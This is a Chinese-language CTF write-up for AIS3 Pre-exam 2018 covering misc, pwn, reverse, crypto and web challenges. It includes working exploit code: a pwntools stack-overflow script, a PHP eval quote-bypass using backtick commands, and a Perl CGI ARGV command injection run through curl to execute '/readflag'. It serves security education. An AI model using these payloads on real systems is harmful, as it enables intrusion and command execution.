Skip to content

AIS3 Pre-exam 2018

出題者好壞ww

Misc1

送分題,直接給flag

Misc2

一張jpg,裡面3個假flag 通常這種題目我都會先用binwalk看看,結果發現有zip,想說把它拿出來解壓縮,結果要密碼,本來想說是偽加密,把binary改一下應該就好了,結果改了還是打不開,就先放一邊 後來給了提示,說看看圖片裡假flag的下面,仔細一看,竟然是摩斯密碼...... .- .. ... ...-- -.-- --- ..- ..-. .. -. -.. - ..... . .-. . .- .-.. ..-. .-.. .- --. --- .... -.-- . .- .... 因為畫質不太好,有些可能有看錯,稍微腦補一下 Flag:AIS3{YOUFINDTHEREALFLAGOHYEAH}

Misc3

MP3stego直接用就有了

Pwn1

有一個function會輸出flag 可以輸入兩個字串,是用gets,多的東西就直接從stack蓋過去了,所以就把main的return address蓋成輸出flag的function就行了 explotion:

from pwn import *
r = remote("104.199.235.135",2111)
addr = 0x400797
payload = 'a'*840+p64(addr)
print r.recvuntil(":")
r.sendline('a')
print r.recvuntil(":")
print payload
r.sendline(payload)
r.interactive()

Reverse1

直接ctrl+F,找AIS3{,就會找到,但是有一堆假的

Reverse2

直接用IDA pro decompile,看到這樣的東西:

void init()
{
  signed int i; // [sp+Ch] [bp-4h]@1

  srand(0);
  for ( i = 0; i <= 84; ++i )
  {
    secret[i] += 5;
    secret[i] >>= 1;
    secret[i] -= 10;
    secret[i] >>= 2;
  }
}

//----- (0000000000000930) ----------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax@10
  __int64 v4; // rsi@10
  int v5; // [sp+4h] [bp-1Ch]@7
  int i; // [sp+8h] [bp-18h]@3
  int v7; // [sp+Ch] [bp-14h]@7
  FILE *stream; // [sp+10h] [bp-10h]@1
  __int64 v9; // [sp+18h] [bp-8h]@1

  v9 = *MK_FP(__FS__, 40LL);
  stream = fopen("/tmp/secret", "w");
  init();
  puts("========== WELCOME TO MY MIND ==========");
  puts("Try to find out secret in my mind!!!");
  while ( cnt != 85 )
  {
    __isoc99_scanf("%d", &v5);
    v7 = rand() % 2018;
    if ( v7 != v5 )
    {
      puts("Get out!!! You don't know me.");
      goto LABEL_10;
    }
    secret[cnt] ^= v5;
    puts("Nice try! Next one.");
    ++cnt;
  }
  for ( i = 0; i <= 84; ++i )
    fputc((unsigned __int8)secret[i], stream);
  puts("You know the flag~~~");
LABEL_10:
  result = 0;
  v4 = *MK_FP(__FS__, 40LL) ^ v9;
  return result;
}

關鍵在srand(0),這代表不是隨機,所以就寫一個一樣的就好

#include<bits/stdc++.h>
using namespace std;
int main(){
    srand(0);
    for(int i=0;i<=84;i++){
        cout<<rand()%2018<<endl;
    }
    return 0;
}

直接$ ./exploit | ./secret

Crypto1

POW proof of work

==================== proof of work ====================
please give me an x satisfying the following condition
condition : x[:6] == '0H1O4K' and hashlib.sha256(x).hexdigest()[:6] == '000000'
x =

前綴每次都不同 就真的是proof of work,直接硬幹

import hashlib
import random
from pwn import *

r = remote("104.199.235.135",20000)

dic = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"

suffix = "5KAJTC"
#suffix = raw_input();
prefix = "28KVRZ9JZ1"

r.recvline()
r.recvline()
text = r.recvline()
suffix = (text[22:])[:6]
#condition : x[:6] == 'GZLXFZ' and hashlib.sha256(x).hexdigest()[:6] == '000000'
print suffix
r.recvuntil("= ")


s = suffix+prefix
hash = hashlib.sha256(s).hexdigest()[:6]

ok = False

for a in range(0,36):
    if ok:
        break;
    for b in range(0,36):
        if ok:
            break;
        for c in range(0,36):
            if ok:
                break;
            for d in range(0,36):
                if ok:
                    break;
                for e in range(0,36):
                    prefix = dic[a]+dic[b]+dic[c]+dic[d]+dic[e]
                    s = suffix+prefix
                    hash = hashlib.sha256(s).hexdigest()[:6]
                    #print hash
                    if hash =='000000':
                        print s
                        ok = True;
                        break;


r.sendline(s)
r.interactive()

Crypto2

XOR 這好像是我第一次這麼認真解crypto吧,以前大概都直接跳過 題目給了兩個檔案,加密後的東西跟加密程式 encrypt:

#!/usr/bin/env python3
import os
import random

with open('flag', 'rb') as data:
    flag = data.read()
    assert(flag.startswith(b'AIS3{'))

def extend(key, L):
    kL = len(key)
    return key * (L // kL) + key[:L % kL]

def xor(X, Y):
    return bytes([x ^ y for x, y in zip(X, Y)])

key = os.urandom(random.randint(8, 12))
plain = flag + key
key = extend(key, len(plain))
cipher = xor(plain, key)

with open('flag-encrypted', 'wb') as data:
    data.write(cipher)

觀察後會發現,它的加密方式是先隨機產一個key,長度是8~12隨機選,然後會把flag跟key放在一起當成被加密的原文,然後加密的key則是透過重複接好幾次來變成跟原文一樣長,然後做xor得到密文 思考了一下,我們有一點已知的明文:AIS3{,而這串明文也位於整個密文的開頭,因此我們可以將密文的前5個byte跟這串明文做xor,這樣就能得到key的前5個byte:16 09 7c c7 dd 接著得想辦法知道key實際到底多長,我們已經知道加密的key是由原本的key重複很多次串起來的,也就是說在中間還有很多段是一樣用這五個byte來加密的,而如果是flag,就算只有五個字元應該也是能夠分辨出來,所以就寫一個script,把密文從頭到尾都試試看

import os
import random

with open('5key', 'rb') as data:
    key5 = data.read()
with open('flag-encrypted', 'rb') as data:
    flag = data.read()

def extend(key, L):
    kL = len(key)
    return key * (L // kL) + key[:L % kL]

def xor(X, Y):
    return bytes([x ^ y for x, y in zip(X, Y)])

for i in range(0,len(flag)-5):
    plain = flag[i:i+5+1]
    cipher = xor(key5,plain)
    print("%d : %s" % (i,cipher))

跑出來的結果(中間省略一些不是flag的東西):

0 : b'AIS3{'
1 : b'V&\x88a\xf1'
2 : b'9\xfd\xda\xeb\x92'
3 : b'\xe2\xafP\x88?'
4 : b'\xb0%3%\x0e'
5 : b':F\x9e\x14c'
10 : b'In aM'
20 : b' - Wh'
30 : b'R Hap'
40 : b't0mOR'
50 : b'OU mU'
60 : b'0Mis3'
70 : b'n3 tH'
80 : b'TH4T '
90 : b'iLL s'
100 : b'ho Y0'
110 : b'. Not'
120 : b'Rfect'
130 : b'IER, '
140 : b' gOOD'
150 : b'}\x16\t|\xc7'
155 : b'\x84h\xc0\xf2\x85'

這樣我們就能算出key的長度是10,因為兩次正確解密之間差了10個byte 接著我們還能發現flag的長度是151,最後停在150的位置,因為這樣的偏移,使我們能夠算出完整flag,下面用一張表來說明 這張表使用kn來代表key的第n個byte

原文 } k1 k2 k3 k4 k5 k6
加密用的key k1 k2 k3 k4 k5 k6 k7
密文 }^k1 k1^k2 k2^k3 k3^k4 k4^k5 k5^k6 k6^k7

先看原文為k5的那個byte,將那個byte的密文跟k5做xor,就能得到k6 有了k6,就可以在往下一個byte算出k7,如此下去,就能算出完整的key了,有了完整的key,就能解出原文

找出key的code:

import os
import random
with open('5key', 'rb') as data:
    key5 = data.read()
with open('flag-encrypted', 'rb') as data:
    flag = data.read()

def extend(key, L):
    kL = len(key)
    return key * (L // kL) + key[:L % kL]

def xor(X, Y):
    return bytes([x ^ y for x, y in zip(X, Y)])

key = key5
with open('key', '+wb') as data:
    data.write(key)
    for i in range(155,160):
        tk = bytes([key[4+i-155]^flag[i]])
        data.write(tk)
        key = key+tk

解密的code:

import os
import random
with open('key', 'rb') as data:
    key = data.read()
with open('flag-encrypted', 'rb') as data:
    flag = data.read()

def extend(key, L):
    kL = len(key)
    return key * (L // kL) + key[:L % kL]

def xor(X, Y):
    return bytes([x ^ y for x, y in zip(X, Y)])

plain = flag
key = extend(key, len(plain))
cipher = xor(plain, key)
print(cipher)
with open('flag', 'wb') as data:
    data.write(cipher)

Flag: AIS3{captAIn aMeric4 - Wh4T3V3R HapPenS t0mORr0w YOU mUst PR0Mis3 ME on3 tHIng. TH4T yOu WiLL stAY Who Y0U 4RE. Not A pERfect sO1dIER, buT 4 gOOD MAn.} 超級長

Web1

http://104.199.235.135:31331/index.php?p=7 進去會看到Did you see the flag 原本以為跟去年一樣是http 302,結果不是 後來發現header有Partial-Flag,然後改了一下參數,發現有不同的字,寫個script抓一抓就出來了

<?php

for($p=1;$p<=2050;$p++){
    $result = get_headers("http://104.199.235.135:31331/index.php?p=$p", 1);
    echo $p;
    echo $result['Partial-Flag'];
    echo "\n";
}

Web2

進去後顯示There is a secret page in the website. Can you find it? 馬上想到robots.txt 打開後發現

User-agent: *
Disallow: /admin
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /tmp/
Disallow: /private/
Disallow: /_hidden_flag_.php

看來是在_hidden_flag_.php,進去後顯示Hmm ... no flag here!,然後有個倒數,倒數完會跳出一個按鈕Get flag in the next page.,點下去就是一樣的動作,但是從原始碼會發現這樣的東西

<html>
<head>
<meta charset="utf-8"/>
<script type="text/javascript" src="_hidden_flag_.js"></script>
</head>
<body>
Hmm ... no flag here!<form method="post">
<input type="hidden" name="c" value="1"/>
<input type="hidden" name="s" value="3241b876891b9ea67db897e940db6ea9e7e351447546b8da82bbf3693dfe9ebb"/>
<span id="disp"></span>
</form>
</body>

<html>
<head>
<meta charset="utf-8"/>
<script type="text/javascript" src="_hidden_flag_.js"></script>
</head>
<body>
Hmm ... no flag here!<form method="post">
<input type="hidden" name="c" value="2"/>
<input type="hidden" name="s" value="6d16a8d466b16f456bf9a3faeef31db59612cbb11ce64e0196b07d25ed2cff4e"/>
<span id="disp"></span>
</form>
</body>

__hidden_flag_.js

var _0x13ed=['getElementById','disp','setInterval','onload','clearInterval','innerHTML','<input\x20type=\x22submit\x22\x20value=\x22Get\x20flag\x20in\x20the\x20next\x20page.\x22/>'];(function(_0x4ff87b,_0x35e2bc){var _0x2c01be=function(_0x216360){while(--_0x216360){_0x4ff87b['push'](_0x4ff87b['shift']());}};_0x2c01be(++_0x35e2bc);}(_0x13ed,0x13f));var _0x5d44=function(_0x592680,_0x1e9b97){_0x592680=_0x592680-0x0;var _0x50206c=_0x13ed[_0x592680];return _0x50206c;};var left=0x0;var timer=null;var disp=null;function countdown(){left=left-0x1;if(timer!=null&&left==0x0){window[_0x5d44('0x0')](timer);timer=null;disp[_0x5d44('0x1')]=_0x5d44('0x2');}else{disp[_0x5d44('0x1')]='('+left+')';}}function setup(){disp=document[_0x5d44('0x3')](_0x5d44('0x4'));left=0xa+parseInt(Math['random']()*0xa);timer=window[_0x5d44('0x5')](countdown,0x3e8);disp[_0x5d44('0x1')]='('+left+')';}window[_0x5d44('0x6')]=setup;

然後就會發現post過去1,會給2,post過去2,會給3,跟javascript根本沒關係 然後在仔細觀察一下header,會發現有一個Flag: AIS3{NOT_A_VALID_FLAG},很顯然是錯的,那就應該是多跑幾次,就會出現對的。 那就寫一個script

<?php

$url = "104.199.235.135:31332/_hidden_flag_.php";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch , CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

//$c = "46828";
//$s = "4818d80ac35251a43047417fe68ac4c94aab3586adc8d0b41063f796ecbef122";

$c = "5521";
$s = "56483453de40c26df92cc87deb70b173c405483f2571e8a24d2d48e48f0f0dc4";

while(1){
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array("c"=>"$c", "s"=>"$s"))); 
    $output = curl_exec($ch);
    //str_replace(array("\r\n","\t","  ","\n"),"",$output);
    //echo $output;
    preg_match("/name=\"c\"\svalue=\".+/",$output,$cm);
    preg_match("/[0-9]+/",$cm[0],$cm);
    preg_match("/name=\"s\"\svalue=\".+/",$output,$sm);
    preg_match("/value=\".+/",$sm[0],$sm);
    preg_match("/\".+/",$sm[0],$sm);
    preg_match("/[0-9a-z]+/",$sm[0],$sm);
    preg_match("/Flag.+/",$output,$flag);
    //var_dump($cm);
    //var_dump($sm);
    $cm = $cm[0];
    $sm = $sm[0];
    $flag = $flag[0];
    echo $cm."\n".$sm."\n".$flag."\n\n";
    if(!strpos($flag,"NOT_A_VALID_FLAG")){
        break;
    }
    $c = $cm;
    $s = $sm;
}
curl_close($ch);

剛開始沒發現flag,跑到4萬多s變成N/A,後來才發現,於是又重跑,最後在17332的地方出現flag 出題者真是有夠壞

Web3

Sushi

<?php
// PHP is the best language for hacker
// Find the flag !!
highlight_file(__FILE__);
$_ = $_GET['??'];

if( strpos($_, '"') || strpos($_, "'") ) 
    die('Bad Hacker :(');

eval('die("' . substr($_, 0, 16) . '");');

隨便亂試後發現"'只要在整個字串的第一個出現過,後面再出現,就不會被擋掉,原因是strpos是找出該字串第一次出現的位置,而這麼做第一次出現的位置便會是0,然後if這樣寫就會當成false 於是就先生出這樣:".exec("ls").",然後發現phpinfo.php,想說會在其他目錄,但是想要找其他目錄指令會太長,所以又想了一下,可以把exec換成兩個反引號,變成".‵ls‵.",然後就跑出其他檔案,裡面就有flag,檔案是flag_name_1s_t00_l0ng_QAQQQQQQ,檔名太長,不能用cat,那就直接把檔名加在網址後就能看了 exec只看到phpinfo.php的原因是exec預設只會給出最後一行的輸出

Web4

perljam 又是藏了.git 用Githack抓下來,發現一份檔案 index-b44be173b965d6bdc0b784b6797fac0a.cgi.bak

#!/usr/bin/perl
# My uploader!
use strict;
use warnings;
use CGI;
my $cgi = CGI->new;
print $cgi->header();
print "<body style=\"background: #caccf7 url('https://i.imgur.com/Syv2IVk.png');padding: 30px;\">";
print "<p style='color:red'>No BUG Q_____Q</p>";
print "<br>";
print "<pre>";
if( $cgi->upload('file') ) {
        my $file = $cgi->param('file');
        while(<$file>) {
                print "$_";
        }
}
print "</pre>";

上網找一找,發現了 https://github.com/isislab/CSAW-CTF-2016-Quals/tree/master/Web/I%20Got%20Id 把payload改一下
echo "asdf" | curl -F "file=ARGV" -F "file=@-" "http://104.19135:31334/cgi-bin/index.cgi?ls /|" 找到readflag
echo "asdf" | curl -F "file=ARGV" -F "file=@-" "http://104.19135:31334/cgi-bin/index.cgi?/readflag|" 執行readflag,flag就噴出來了